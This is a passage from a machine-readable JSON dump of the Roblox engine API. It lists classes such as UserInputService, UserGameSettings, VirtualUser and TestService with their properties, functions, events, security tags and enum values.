:[],"Class":"TestService"},{"ValueType":"double","type":"Property","Name":"SimulateSecondsLag","tags":[],"Class":"TestService"},{"ValueType":"int","type":"Property","Name":"TestCount","tags":["readonly"],"Class":"TestService"},{"ValueType":"double","type":"Property","Name":"Timeout","tags":[],"Class":"TestService"},{"ValueType":"int","type":"Property","Name":"WarnCount","tags":["readonly"],"Class":"TestService"},{"ReturnType":"void","Arguments":[{"Type":"bool","Name":"condition","Default":null},{"Type":"string","Name":"description","Default":null},{"Type":"Instance","Name":"source","Default":"nil"},{"Type":"int","Name":"line","Default":"0"}],"Name":"Check","tags":[],"Class":"TestService","type":"Function"},{"ReturnType":"void","Arguments":[{"Type":"string","Name":"text","Default":null},{"Type":"Instance","Name":"source","Default":"nil"},{"Type":"int","Name":"line","Default":"0"}],"Name":"Checkpoint","tags":[],"Class":"TestService","type":"Function"},{"ReturnType":"void","Arguments":[],"Name":"Done","tags":[],"Class":"TestService","type":"Function"},{"ReturnType":"void","Arguments":[{"Type":"string","Name":"description","Default":null},{"Type":"Instance","Name":"source","Default":"nil"},{"Type":"int","Name":"line","Default":"0"}],"Name":"Error","tags":[],"Class":"TestService","type":"Function"},{"ReturnType":"void","Arguments":[{"Type":"string","Name":"description","Default":null},{"Type":"Instance","Name":"source","Default":"nil"},{"Type":"int","Name":"line","Default":"0"}],"Name":"Fail","tags":[],"Class":"TestService","type":"Function"},{"ReturnType":"void","Arguments":[{"Type":"string","Name":"text","Default":null},{"Type":"Instance","Name":"source","Default":"nil"},{"Type":"int","Name":"line","Default":"0"}],"Name":"Message","tags":[],"Class":"TestService","type":"Function"},{"ReturnType":"void","Arguments":[{"Type":"bool","Name":"condition","Default":null},{"Type":"string","Name":"description","Default":null},{"Type":"Instance","Name":"source","Default":"nil"},{"Type":"int","Name":"line","Default":"0"}],"Name":"Require","tags":[],"Class":"TestService","type":"Function"},{"ReturnType":"void","Arguments":[{"Type":"bool","Name":"condition","Default":null},{"Type":"string","Name":"description","Default":null},{"Type":"Instance","Name":"source","Default":"nil"},{"Type":"int","Name":"line","Default":"0"}],"Name":"Warn","tags":[],"Class":"TestService","type":"Function"},{"ReturnType":"void","Arguments":[],"Name":"Run","tags":["PluginSecurity"],"Class":"TestService","type":"YieldFunction"},{"Arguments":[{"Name":"condition","Type":"bool"},{"Name":"text","Type":"string"},{"Name":"script","Type":"Instance"},{"Name":"line","Type":"int"}],"Name":"ServerCollectConditionalResult","tags":[],"Class":"TestService","type":"Event"},{"Arguments":[{"Name":"text","Type":"string"},{"Name":"script","Type":"Instance"},{"Name":"line","Type":"int"}],"Name":"ServerCollectResult","tags":[],"Class":"TestService","type":"Event"},{"Superclass":"Instance","type":"Class","Name":"TextService","tags":["notCreatable"]},{"ReturnType":"Vector2","Arguments":[{"Type":"string","Name":"string","Default":null},{"Type":"int","Name":"fontSize","Default":null},{"Type":"Font","Name":"font","Default":null},{"Type":"Vector2","Name":"frameSize","Default":null}],"Name":"GetTextSize","tags":["RobloxScriptSecurity"],"Class":"TextService","type":"Function"},{"Superclass":"Instance","type":"Class","Name":"TimerService","tags":["notCreatable"]},{"Superclass":"Instance","type":"Class","Name":"Toolbar","tags":[]},{"ReturnType":"Instance","Arguments":[{"Type":"string","Name":"text","Default":null},{"Type":"string","Name":"tooltip","Default":null},{"Type":"string","Name":"iconname","Default":null}],"Name":"CreateButton","tags":["PluginSecurity"],"Class":"Toolbar","type":"Function"},{"Superclass":"Instance","type":"Class","Name":"TouchInputService","tags":[]},{"Superclass":"Instance","type":"Class","Name":"TouchTransmitter","tags":["notCreatable","notbrowsable"]},{"Superclass":"Instance","type":"Class","Name":"TweenService","tags":[]},{"Superclass":"Instance","type":"Class","Name":"UserGameSettings","tags":[]},{"ValueType":"bool","type":"Property","Name":"AllTutorialsDisabled","tags":["RobloxScriptSecurity"],"Class":"UserGameSettings"},{"ValueType":"CustomCameraMode","type":"Property","Name":"CameraMode","tags":["RobloxScriptSecurity"],"Class":"UserGameSettings"},{"ValueType":"ComputerCameraMovementMode","type":"Property","Name":"ComputerCameraMovementMode","tags":[],"Class":"UserGameSettings"},{"ValueType":"ComputerMovementMode","type":"Property","Name":"ComputerMovementMode","tags":[],"Class":"UserGameSettings"},{"ValueType":"ControlMode","type":"Property","Name":"ControlMode","tags":[],"Class":"UserGameSettings"},{"ValueType":"bool","type":"Property","Name":"Fullscreen","tags":["RobloxScriptSecurity"],"Class":"UserGameSettings"},{"ValueType":"UploadSetting","type":"Property","Name":"ImageUploadPromptBehavior","tags":["RobloxScriptSecurity"],"Class":"UserGameSettings"},{"ValueType":"float","type":"Property","Name":"MasterVolume","tags":[],"Class":"UserGameSettings"},{"ValueType":"float","type":"Property","Name":"MouseSensitivity","tags":[],"Class":"UserGameSettings"},{"ValueType":"RotationType","type":"Property","Name":"RotationType","tags":[],"Class":"UserGameSettings"},{"ValueType":"SavedQualitySetting","type":"Property","Name":"SavedQualityLevel","tags":[],"Class":"UserGameSettings"},{"ValueType":"TouchCameraMovementMode","type":"Property","Name":"TouchCameraMovementMode","tags":[],"Class":"UserGameSettings"},{"ValueType":"TouchMovementMode","type":"Property","Name":"TouchMovementMode","tags":[],"Class":"UserGameSettings"},{"ValueType":"bool","type":"Property","Name":"UsedHideHudShortcut","tags":["RobloxScriptSecurity"],"Class":"UserGameSettings"},{"ValueType":"int","type":"Property","Name":"VRRotationIntensity","tags":["RobloxScriptSecurity"],"Class":"UserGameSettings"},{"ValueType":"UploadSetting","type":"Property","Name":"VideoUploadPromptBehavior","tags":["RobloxScriptSecurity"],"Class":"UserGameSettings"},{"ReturnType":"bool","Arguments":[{"Type":"string","Name":"tutorialId","Default":null}],"Name":"GetTutorialState","tags":["RobloxScriptSecurity"],"Class":"UserGameSettings","type":"Function"},{"ReturnType":"bool","Arguments":[],"Name":"InFullScreen","tags":[],"Class":"UserGameSettings","type":"Function"},{"ReturnType":"bool","Arguments":[],"Name":"InStudioMode","tags":[],"Class":"UserGameSettings","type":"Function"},{"ReturnType":"void","Arguments":[{"Type":"string","Name":"tutorialId","Default":null},{"Type":"bool","Name":"value","Default":null}],"Name":"SetTutorialState","tags":["RobloxScriptSecurity"],"Class":"UserGameSettings","type":"Function"},{"Arguments":[{"Name":"isFullscreen","Type":"bool"}],"Name":"FullscreenChanged","tags":[],"Class":"UserGameSettings","type":"Event"},{"Arguments":[{"Name":"isStudioMode","Type":"bool"}],"Name":"StudioModeChanged","tags":[],"Class":"UserGameSettings","type":"Event"},{"Superclass":"Instance","type":"Class","Name":"UserInputService","tags":["notCreatable"]},{"ValueType":"bool","type":"Property","Name":"AccelerometerEnabled","tags":["readonly"],"Class":"UserInputService"},{"ValueType":"bool","type":"Property","Name":"GamepadEnabled","tags":["readonly"],"Class":"UserInputService"},{"ValueType":"bool","type":"Property","Name":"GyroscopeEnabled","tags":["readonly"],"Class":"UserInputService"},{"ValueType":"bool","type":"Property","Name":"KeyboardEnabled","tags":["readonly"],"Class":"UserInputService"},{"ValueType":"bool","type":"Property","Name":"ModalEnabled","tags":[],"Class":"UserInputService"},{"ValueType":"MouseBehavior","type":"Property","Name":"MouseBehavior","tags":[],"Class":"UserInputService"},{"ValueType":"bool","type":"Property","Name":"MouseEnabled","tags":["readonly"],"Class":"UserInputService"},{"ValueType":"bool","type":"Property","Name":"MouseIconEnabled","tags":[],"Class":"UserInputService"},{"ValueType":"OverrideMouseIconBehavior","type":"Property","Name":"OverrideMouseIconBehavior","tags":["RobloxScriptSecurity"],"Class":"UserInputService"},{"ValueType":"bool","type":"Property","Name":"TouchEnabled","tags":["readonly"],"Class":"UserInputService"},{"ValueType":"CoordinateFrame","type":"Property","Name":"UserHeadCFrame","tags":["deprecated","readonly"],"Class":"UserInputService"},{"ValueType":"bool","type":"Property","Name":"VREnabled","tags":["readonly"],"Class":"UserInputService"},{"ReturnType":"bool","Arguments":[{"Type":"UserInputType","Name":"gamepadNum","Default":null},{"Type":"KeyCode","Name":"gamepadKeyCode","Default":null}],"Name":"GamepadSupports","tags":[],"Class":"UserInputService","type":"Function"},{"ReturnType":"Array","Arguments":[],"Name":"GetConnectedGamepads","tags":[],"Class":"UserInputService","type":"Function"},{"ReturnType":"Instance","Arguments":[],"Name":"GetDeviceAcceleration","tags":[],"Class":"UserInputService","type":"Function"},{"ReturnType":"Instance","Arguments":[],"Name":"GetDeviceGravity","tags":[],"Class":"UserInputService","type":"Function"},{"ReturnType":"Tuple","Arguments":[],"Name":"GetDeviceRotation","tags":[],"Class":"UserInputService","type":"Function"},{"ReturnType":"Instance","Arguments":[],"Name":"GetFocusedTextBox","tags":[],"Class":"UserInputService","type":"Function"},{"ReturnType":"bool","Arguments":[{"Type":"UserInputType","Name":"gamepadNum","Default":null}],"Name":"GetGamepadConnected","tags":[],"Class":"UserInputService","type":"Function"},{"ReturnType":"Array","Arguments":[{"Type":"UserInputType","Name":"gamepadNum","Default":null}],"Name":"GetGamepadState","tags":[],"Class":"UserInputService","type":"Function"},{"ReturnType":"Array","Arguments":[],"Name":"GetKeysPressed","tags":[],"Class":"UserInputService","type":"Function"},{"ReturnType":"UserInputType","Arguments":[],"Name":"GetLastInputType","tags":[],"Class":"UserInputService","type":"Function"},{"ReturnType":"Array","Arguments":[],"Name":"GetNavigationGamepads","tags":[],"Class":"UserInputService","type":"Function"},{"ReturnType":"Platform","Arguments":[],"Name":"GetPlatform","tags":["RobloxScriptSecurity"],"Class":"UserInputService","type":"Function"},{"ReturnType":"Array","Arguments":[{"Type":"UserInputType","Name":"gamepadNum","Default":null}],"Name":"GetSupportedGamepadKeyCodes","tags":[],"Class":"UserInputService","type":"Function"},{"ReturnType":"CoordinateFrame","Arguments":[{"Type":"UserCFrame","Name":"type","Default":null}],"Name":"GetUserCFrame","tags":[],"Class":"UserInputService","type":"Function"},{"ReturnType":"bool","Arguments":[{"Type":"KeyCode","Name":"keyCode","Default":null}],"Name":"IsKeyDown","tags":[],"Class":"UserInputService","type":"Function"},{"ReturnType":"bool","Arguments":[{"Type":"UserInputType","Name":"gamepadEnum","Default":null}],"Name":"IsNavigationGamepad","tags":[],"Class":"UserInputService","type":"Function"},{"ReturnType":"void","Arguments":[],"Name":"RecenterUserHeadCFrame","tags":[],"Class":"UserInputService","type":"Function"},{"ReturnType":"void","Arguments":[{"Type":"UserInputType","Name":"gamepadEnum","Default":null},{"Type":"bool","Name":"enabled","Default":null}],"Name":"SetNavigationGamepad","tags":[],"Class":"UserInputService","type":"Function"},{"Arguments":[{"Name":"acceleration","Type":"Instance"}],"Name":"DeviceAccelerationChanged","tags":[],"Class":"UserInputService","type":"Event"},{"Arguments":[{"Name":"gravity","Type":"Instance"}],"Name":"DeviceGravityChanged","tags":[],"Class":"UserInputService","type":"Event"},{"Arguments":[{"Name":"rotation","Type":"Instance"},{"Name":"cframe","Type":"CoordinateFrame"}],"Name":"DeviceRotationChanged","tags":[],"Class":"UserInputService","type":"Event"},{"Arguments":[{"Name":"gamepadNum","Type":"UserInputType"}],"Name":"GamepadConnected","tags":[],"Class":"UserInputService","type":"Event"},{"Arguments":[{"Name":"gamepadNum","Type":"UserInputType"}],"Name":"GamepadDisconnected","tags":[],"Class":"UserInputService","type":"Event"},{"Arguments":[{"Name":"input","Type":"Instance"},{"Name":"gameProcessedEvent","Type":"bool"}],"Name":"InputBegan","tags":[],"Class":"UserInputService","type":"Event"},{"Arguments":[{"Name":"input","Type":"Instance"},{"Name":"gameProcessedEvent","Type":"bool"}],"Name":"InputChanged","tags":[],"Class":"UserInputService","type":"Event"},{"Arguments":[{"Name":"input","Type":"Instance"},{"Name":"gameProcessedEvent","Type":"bool"}],"Name":"InputEnded","tags":[],"Class":"UserInputService","type":"Event"},{"Arguments":[],"Name":"JumpRequest","tags":[],"Class":"UserInputService","type":"Event"},{"Arguments":[{"Name":"lastInputType","Type":"UserInputType"}],"Name":"LastInputTypeChanged","tags":[],"Class":"UserInputService","type":"Event"},{"Arguments":[{"Name":"textboxReleased","Type":"Instance"}],"Name":"TextBoxFocusReleased","tags":[],"Class":"UserInputService","type":"Event"},{"Arguments":[{"Name":"textboxFocused","Type":"Instance"}],"Name":"TextBoxFocused","tags":[],"Class":"UserInputService","type":"Event"},{"Arguments":[{"Name":"touch","Type":"Instance"},{"Name":"gameProcessedEvent","Type":"bool"}],"Name":"TouchEnded","tags":[],"Class":"UserInputService","type":"Event"},{"Arguments":[{"Name":"touchPositions","Type":"Array"},{"Name":"state","Type":"UserInputState"},{"Name":"gameProcessedEvent","Type":"bool"}],"Name":"TouchLongPress","tags":[],"Class":"UserInputService","type":"Event"},{"Arguments":[{"Name":"touch","Type":"Instance"},{"Name":"gameProcessedEvent","Type":"bool"}],"Name":"TouchMoved","tags":[],"Class":"UserInputService","type":"Event"},{"Arguments":[{"Name":"touchPositions","Type":"Array"},{"Name":"totalTranslation","Type":"Vector2"},{"Name":"velocity","Type":"Vector2"},{"Name":"state","Type":"UserInputState"},{"Name":"gameProcessedEvent","Type":"bool"}],"Name":"TouchPan","tags":[],"Class":"UserInputService","type":"Event"},{"Arguments":[{"Name":"touchPositions","Type":"Array"},{"Name":"scale","Type":"float"},{"Name":"velocity","Type":"float"},{"Name":"state","Type":"UserInputState"},{"Name":"gameProcessedEvent","Type":"bool"}],"Name":"TouchPinch","tags":[],"Class":"UserInputService","type":"Event"},{"Arguments":[{"Name":"touchPositions","Type":"Array"},{"Name":"rotation","Type":"float"},{"Name":"velocity","Type":"float"},{"Name":"state","Type":"UserInputState"},{"Name":"gameProcessedEvent","Type":"bool"}],"Name":"TouchRotate","tags":[],"Class":"UserInputService","type":"Event"},{"Arguments":[{"Name":"touch","Type":"Instance"},{"Name":"gameProcessedEvent","Type":"bool"}],"Name":"TouchStarted","tags":[],"Class":"UserInputService","type":"Event"},{"Arguments":[{"Name":"swipeDirection","Type":"SwipeDirection"},{"Name":"numberOfTouches","Type":"int"},{"Name":"gameProcessedEvent","Type":"bool"}],"Name":"TouchSwipe","tags":[],"Class":"UserInputService","type":"Event"},{"Arguments":[{"Name":"touchPositions","Type":"Array"},{"Name":"gameProcessedEvent","Type":"bool"}],"Name":"TouchTap","tags":[],"Class":"UserInputService","type":"Event"},{"Arguments":[{"Name":"type","Type":"UserCFrame"},{"Name":"value","Type":"CoordinateFrame"}],"Name":"UserCFrameChanged","tags":[],"Class":"UserInputService","type":"Event"},{"Arguments":[],"Name":"WindowFocusReleased","tags":[],"Class":"UserInputService","type":"Event"},{"Arguments":[],"Name":"WindowFocused","tags":[],"Class":"UserInputService","type":"Event"},{"Superclass":"Instance","type":"Class","Name":"Vector3Value","tags":[]},{"ValueType":"Vector3","type":"Property","Name":"Value","tags":[],"Class":"Vector3Value"},{"Arguments":[{"Name":"value","Type":"Vector3"}],"Name":"Changed","tags":[],"Class":"Vector3Value","type":"Event"},{"Arguments":[{"Name":"value","Type":"Vector3"}],"Name":"changed","tags":["deprecated"],"Class":"Vector3Value","type":"Event"},{"Superclass":"Instance","type":"Class","Name":"VirtualUser","tags":["notCreatable"]},{"ReturnType":"void","Arguments":[{"Type":"Vector2","Name":"position","Default":null},{"Type":"CoordinateFrame","Name":"camera","Default":"Identity"}],"Name":"Button1Down","tags":["LocalUserSecurity"],"Class":"VirtualUser","type":"Function"},{"ReturnType":"void","Arguments":[{"Type":"Vector2","Name":"position","Default":null},{"Type":"CoordinateFrame","Name":"camera","Default":"Identity"}],"Name":"Button1Up","tags":["LocalUserSecurity"],"Class":"VirtualUser","type":"Function"},{"ReturnType":"void","Arguments":[{"Type":"Vector2","Name":"position","Default":null},{"Type":"CoordinateFrame","Name":"camera","Default":"Identity"}],"Name":"Button2Down","tags":["LocalUserSecurity"],"Class":"VirtualUser","type":"Function"},{"ReturnType":"void","Arguments":[{"Type":"Vector2","Name":"position","Default":null},{"Type":"CoordinateFrame","Name":"camera","Default":"Identity"}],"Name":"Button2Up","tags":["LocalUserSecurity"],"Class":"VirtualUser","type":"Function"},{"ReturnType":"void","Arguments":[],"Name":"CaptureController","tags":["LocalUserSecurity"],"Class":"VirtualUser","type":"Function"},{"ReturnType":"void","Arguments":[{"Type":"Vector2","Name":"position","Default":null},{"Type":"CoordinateFrame","Name":"camera","Default":"Identity"}],"Name":"ClickButton1","tags":["LocalUserSecurity"],"Class":"VirtualUser","type":"Function"},{"ReturnType":"void","Arguments":[{"Type":"Vector2","Name":"position","Default":null},{"Type":"CoordinateFrame","Name":"camera","Default":"Identity"}],"Name":"ClickButton2","tags":["LocalUserSecurity"],"Class":"VirtualUser","type":"Function"},{"ReturnType":"void","Arguments":[{"Type":"Vector2","Name":"position","Default":null},{"Type":"CoordinateFrame","Name":"camera","Default":"Identity"}],"Name":"MoveMouse","tags":["LocalUserSecurity"],"Class":"VirtualUser","type":"Function"},{"ReturnType":"void","Arguments":[{"Type":"string","Name":"key","Default":null}],"Name":"SetKeyDown","tags":["LocalUserSecurity"],"Class":"VirtualUser","type":"Function"},{"ReturnType":"void","Arguments":[{"Type":"string","Name":"key","Default":null}],"Name":"SetKeyUp","tags":["LocalUserSecurity"],"Class":"VirtualUser","type":"Function"},{"ReturnType":"void","Arguments":[],"Name":"StartRecording","tags":["LocalUserSecurity"],"Class":"VirtualUser","type":"Function"},{"ReturnType":"string","Arguments":[],"Name":"StopRecording","tags":["LocalUserSecurity"],"Class":"VirtualUser","type":"Function"},{"ReturnType":"void","Arguments":[{"Type":"string","Name":"key","Default":null}],"Name":"TypeKey","tags":["LocalUserSecurity"],"Class":"VirtualUser","type":"Function"},{"Superclass":"Instance","type":"Class","Name":"Visit","tags":["notCreatable"]},{"ReturnType":"string","Arguments":[],"Name":"GetUploadUrl","tags":["RobloxSecurity"],"Class":"Visit","type":"Function"},{"ReturnType":"void","Arguments":[{"Type":"string","Name":"pingUrl","Default":null},{"Type":"int","Name":"interval","Default":null}],"Name":"SetPing","tags":["RobloxSecurity"],"Class":"Visit","type":"Function"},{"ReturnType":"void","Arguments":[{"Type":"string","Name":"url","Default":null}],"Name":"SetUploadUrl","tags":["RobloxSecurity"],"Class":"Visit","type":"Function"},{"type":"Enum","Name":"AASamples","tags":[]},{"type":"EnumItem","Name":"None","tags":[],"Value":1,"Enum":"AASamples"},{"type":"EnumItem","Name":"4","tags":[],"Value":4,"Enum":"AASamples"},{"type":"EnumItem","Name":"8","tags":[],"Value":8,"Enum":"AASamples"},{"type":"Enum","Name":"AccessType","tags":[]},{"type":"EnumItem","Name":"Me","tags":[],"Value":0,"Enum":"AccessType"},{"type":"EnumItem","Name":"Friends","tags":[],"Value":1,"Enum":"AccessType"},{"type":"EnumItem","Name":"Everyone","tags":[],"Value":2,"Enum":"AccessType"},{"type":"EnumItem","Name":"InviteOnly","tags":[],"Value":3,"Enum":"AccessType"},{"type":"Enum","Name":"ActionType","tags":[]},{"type":"EnumItem","Name":"Nothing","tags":[],"Value":0,"Enum":"ActionType"},{"type":"EnumItem","Name":"Pause","tags":[],"Value":1,"Enum":"ActionType"},{"type":"EnumItem","Name":"Lose","tags":[],"Value":2,"Enum":"ActionType"},{"type":"EnumItem","Name":"Draw","tags":[],"Value":3,"Enum":"ActionType"},{"type":"EnumItem","Name":"Win","tags":[],"Value":4,"Enum":"ActionType"},{"type":"Enum","Name":"ActuatorType","tags":[]},{"type":"EnumItem","Name":"None","tags":[],"Value":0,"Enum":"ActuatorType"},{"type":"EnumItem","Name":"Motor","tags":[],"Value":1,"Enum":"ActuatorType"},{"type":"EnumItem","Name":"Servo","tags":[],"Value":2,"Enum":"ActuatorType"},{"type":"Enum","Name":"AnimationPriority","tags":[]},{"type":"EnumItem","Name":"Idle","tags":[],"Value":0,"Enum":"AnimationPriority"},{"type":"EnumItem","Name":"Movement","tags":[],"Value":1,"Enum":"AnimationPriority"},{"type":"EnumItem","Name":"Action","tags":[],"Value":2,"Enum":"AnimationPriority"},{"type":"EnumItem","Name":"Core","tags":[],"Value":1000,"Enum":"AnimationPriority"},{"type":"Enum","Name":"Antialiasing","tags":[]},{"type":"EnumItem","Name":"Automatic","tags":[],"Value":0,"Enum":"Antialiasing"},{"type":"EnumItem","Name":"Off","tags":[],"Value":2,"Enum":"Antialiasing"},{"type":"EnumItem","Name":"On","tags":[],"Value":1,"Enum":"Antialiasing"},{"type":"Enum","Name":"Axis","tags":[]},{"type":"EnumItem","Name":"X","tags":[],"Value":0,"Enum":"Axis"},{"type":"EnumItem","Name":"Y","tags":[],"Value":1,"Enum":"Axis"},{"type":"EnumItem","Name":"Z","tags":[],"Value":2,"Enum":"Axis"},{"type":"Enum","Name":"BinType","tags":[]},{"type":"EnumItem","Name":"Script","tags":[],"Value":0,"Enum":"BinType"},{"type":"EnumItem","Name":"GameTool","tags":[],"Value":1,"Enum":"BinType"},{"type":"EnumItem","Name":"Grab","tags":[],"Value":2,"Enum":"BinType"},{"type":"EnumItem","Name":"Clone","tags":[],"Value":3,"Enum":"BinType"},{"type":"EnumItem","Name":"Hammer","tags":[],"Value":4,"Enum":"BinType"},{"type":"Enum","Name":"BodyPart","tags":[]},{"type":"EnumItem","Name":"Head","tags":[],"Value":0,"Enum":"BodyPart"},{"type":"EnumItem","Name":"Torso","tags":[],"Value":1,"Enum":"BodyPart"},{"type":"EnumItem","Name":"LeftArm","tags":[],"Value":2,"Enum":"BodyPart"},{"type":"EnumItem","Name":"RightArm","tags":[],"Value":3,"Enum":"BodyPart"},{"type":"EnumItem","Name":"LeftLeg","tags":[],"Value":4,"Enum":"BodyPart"},{"type":"EnumItem","Name":"RightLeg","tags":[],"Value":5,"Enum":"BodyPart"},{"type":"Enum","Name":"Button","tags":[]},{"type":"EnumItem","Name":"Jump","tags":[],"Value":32,"Enum":"Button"},{"type":"EnumItem","Name":"Dismount","tags":[],"Value":8,"Enum":"Button"},{"type":"Enum","Name":"ButtonStyle","tags":[]},{"type":"EnumItem","Name":"Custom","tags":[],"Value":0,"Enum":"ButtonStyle"},{"type":"EnumItem","Name":"RobloxButtonDefault","tags":[],"Value":1,"Enum":"ButtonStyle"},{"type":"EnumItem","Name":"RobloxButton","tags":[],"Value":2,"Enum":"ButtonStyle"},{"type":"EnumItem","Name":"RobloxRoundButton","tags":[],"Value":3,"Enum":"ButtonStyle"},{"type":"EnumItem","Name":"RobloxRoundDefaultButton","tags":[],"Value":4,"Enum":"ButtonStyle"},{"type":"EnumItem","Name":"RobloxRoundDropdownButton","tags":[],"Value":5,"Enum":"ButtonStyle"},{"type":"Enum","Name":"CameraMode","tags":[]},{"type":"EnumItem","Name":"Classic","tags":[],"Value":0,"Enum":"CameraMode"},{"type":"EnumItem","Name":"LockFirstPerson","tags":[],"Value":1,"Enum":"CameraMode"},{"type":"Enum","Name":"CameraPanMode","tags":[]},{"type":"EnumItem","Name":"Classic","tags":[],"Value":0,"Enum":"CameraPanMode"},{"type":"EnumItem","Name":"EdgeBump","tags":[],"Value":1,"Enum":"CameraPanMode"},{"type":"Enum","Name":"CameraType","tags":[]},{"type":"EnumItem","Name":"Fixed","tags":[],"Value":0,"Enum":"CameraType"},{"type":"EnumItem","Name":"Watch","tags":[],"Value":2,"Enum":"CameraType"},{"type":"EnumItem","Name":"Attach","tags":[],"Value":1,"Enum":"CameraType"},{"type":"EnumItem","Name":"Track","tags":[],"Value":3,"Enum":"CameraType"},{"type":"EnumItem","Name":"Follow","tags":[],"Value":4,"Enum":"CameraType"},{"type":"EnumItem","Name":"Custom","tags":[],"Value":5,"Enum":"CameraType"},{"type":"EnumItem","Name":"Scriptable","tags":[],"Value":6,"Enum":"CameraType"},{"type":"Enum","Name":"CellBlock","tags":[]},{"type":"EnumItem","Name":"Solid","tags":[],"Value":0,"Enum":"CellBlock"},{"type":"EnumItem","Name":"VerticalWedge","tags":[],"Value":1,"Enum":"CellBlock"},{"type":"EnumItem","Name":"CornerWedge","tags":[],"Value":2,"Enum":"CellBlock"},{"type":"EnumItem","Name":"InverseCornerWedge","tags":[],"Value":3,"Enum":"CellBlock"},{"type":"EnumItem","Name":"HorizontalWedge","tags":[],"Value":4,"Enum":"CellBlock"},{"type":"Enum","Name":"CellMaterial","tags":[]},{"type":"EnumItem","Name":"Empty","tags":[],"Value":0,"Enum":"CellMaterial"},{"type":"EnumItem","Name":"Grass","tags":[],"Value":1,"Enum":"CellMaterial"},{"type":"EnumItem","Name":"Sand","tags":[],"Value":2,"Enum":"CellMaterial"},{"type":"EnumItem","Name":"Brick","tags":[],"Value":3,"Enum":"CellMaterial"},{"type":"EnumItem","Name":"Granite","tags":[],"Value":4,"Enum":"CellMaterial"},{"type":"EnumItem","Name":"Asphalt","tags":[],"Value":5,"Enum":"CellMaterial"},{"type":"EnumItem","Name":"Iron","tags":[],"Value":6,"Enum":"CellMaterial"},{"type":"EnumItem","Name":"Aluminum","tags":[],"Value":7,"Enum":"CellMaterial"},{"type":"EnumItem","Name":"Gold","tags":[],"Value":8,"Enum":"CellMaterial"},{"type":"EnumItem","Name":"WoodPlank","tags":[],"Value":9,"Enum":"CellMaterial"},{"type":"EnumItem","Name":"WoodLog","tags":[],"Value":10,"Enum":"CellMaterial"},{"type":"EnumItem","Name":"Gravel","tags":[],"Value":11,"Enum":"CellMaterial"},{"type":"EnumItem","Name":"CinderBlock","tags":[],"Value":12,"Enum":"CellMaterial"},{"type":"EnumItem","Name":"MossyStone","tags":[],"Value":13,"Enum":"CellMaterial"},{"type":"EnumItem","Name":"Cement","tags":[],"Value":14,"Enum":"CellMaterial"},{"type":"EnumItem","Name":"RedPlastic","tags":[],"Value":15,"Enum":"CellMaterial"},{"type":"EnumItem","Name":"BluePlastic","tags":[],"Value":16,"Enum":"CellMaterial"},{"type":"EnumItem","Name":"Water","tags":[],"Value":17,"Enum":"CellMaterial"},{"type":"Enum","Name":"CellOrientation","tags":[]},{"type":"EnumItem","Name":"NegZ","tags":[],"Value":0,"Enum":"CellOrientation"},{"type":"EnumItem","Name":"X","tags":[],"Value":1,"Enum":"CellOrientation"},{"type":"EnumItem","Name":"Z","tags":[],"Value":2,"Enum":"CellOrientation"},{"type":"EnumItem","Name":"NegX","tags":[],"Value":3,"Enum":"CellOrientation"},{"type":"Enum","Name":"CenterDialogType","tags":[]},{"type":"EnumItem","Name":"UnsolicitedDialog","tags":[],"Value":1,"Enum":"CenterDialogType"},{"type":"EnumItem","Name":"PlayerInitiatedDialog","tags":[],"Value":2,"Enum":"CenterDialogType"},{"type":"EnumItem","Name":"ModalDialog","tags":[],"Value":3,"Enum":"CenterDialogType"},{"type":"EnumItem","Name":"QuitDialog","tags":[],"Value":4,"Enum":"CenterDialogType"},{"type":"Enum","Name":"ChatColor","tags":[]},{"type":"EnumItem","Name":"Blue","tags":[],"Value":0,"Enum":"ChatColor"},{"type":"EnumItem","Name":"Green","tags":[],"Value":1,"Enum":"ChatColor"},{"type":"EnumItem","Name":"Red","tags":[],"Value":2,"Enum":"ChatColor"},{"type":"Enum","Name":"ChatMode","tags":[]},{"type":"EnumItem","Name":"Menu","tags":[],"Value":0,"Enum":"ChatMode"},{"type":"EnumItem","Name":"TextAndMenu","tags":[],"Value":1,"Enum":"ChatMode"},{"type":"Enum","Name":"ChatStyle","tags":[]},{"type":"EnumItem","Name":"Classic","tags":[],"Value":0,"Enum":"ChatStyle"},{"type":"EnumItem","Name":"Bubble","tags":[],"Value":1,"Enum":"ChatStyle"},{"type":"EnumItem","Name":"ClassicAndBubble","tags":[],"Value":2,"Enum":"ChatStyle"},{"type":"Enum","Name":"CollisionFidelity","tags":[]},{"type":"EnumItem","Name":"Default","tags":[],"Value":0,"Enum":"CollisionFidelity"},{"type":"EnumItem","Name":"Hull","tags":[],"Value":1,"Enum":"CollisionFidelity"},{"type":"EnumItem","Name":"Box","tags":[],"Value":2,"Enum":"CollisionFidelity"},{"type":"Enum","Name":"ComputerCameraMovementMode","tags":[]},{"type":"EnumItem","Name":"Default","tags":[],"Value":0,"Enum":"ComputerCameraMovementMode"},{"type":"EnumItem","Name":"Follow","tags":[],"Value":2,"Enum":"ComputerCameraMovementMode"},{"type":"EnumItem","Name":"Classic","tags":[],"Value":1,"Enum":"ComputerCameraMovementMode"},{"type":"Enum","Name":"ComputerMovementMode","tags":[]},{"type":"EnumItem","Name":"Default","tags":[],"Value":0,"Enum":"ComputerMovementMode"},{"type":"EnumItem","Name":"KeyboardMouse","tags":[],"Value":1,"Enum":"ComputerMovementMode"},{"type":"EnumItem","Name":"ClickToMove","tags":[],"Value":2,"Enum":"ComputerMovementMode"},{"type":"Enum","Name":"ConcurrencyModel","tags":[]},{"type":"EnumItem","Name":"Serial","tags":[],"Value":0,"Enum":"ConcurrencyModel"},{"type":"EnumItem","Name":"Safe","tags":[],"Value":1,"Enum":"ConcurrencyModel"},{"type":"EnumItem","Name":"Logical","tags":[],"Value":2,"Enum":"ConcurrencyModel"},{"type":"EnumItem","Name":"Empirical","tags":[],"Value":3,"Enum":"ConcurrencyModel"},{"type":"Enum","Name":"ControlMode","tags":[]},{"type":"EnumItem","Name":"MouseLockSwitch","tags":[],"Value":1,"Enum":"ControlMode"},{"type":"EnumItem","Name":"Classic","tags":[],"Value":0,"Enum":"ControlMode"},{"type":"Enum","Name":"CoreGuiType","tags":[]},{"type":"EnumItem","Name":"PlayerList","tags":[],"Value":0,"Enum":"CoreGuiType"},{"type":"EnumItem","Name":"Health","tags":[],"Value":1,"Enum":"CoreGuiType"},{"type":"EnumItem","Name":"Backpack","tags":[],"Value":2,"Enum":"CoreGuiType"},{"type":"EnumItem","Name":"Chat","tags":[],"Value":3,"Enum":"CoreGuiType"},{"type":"EnumItem","Name":"All","tags":[],"Value":4,"Enum":"CoreGuiType"},{"type":"Enum","Name":"CreatorType","tags":[]},{"type":"EnumItem","Name":"User","tags":[],"Value":0,"Enum":"CreatorType"},{"type":"EnumItem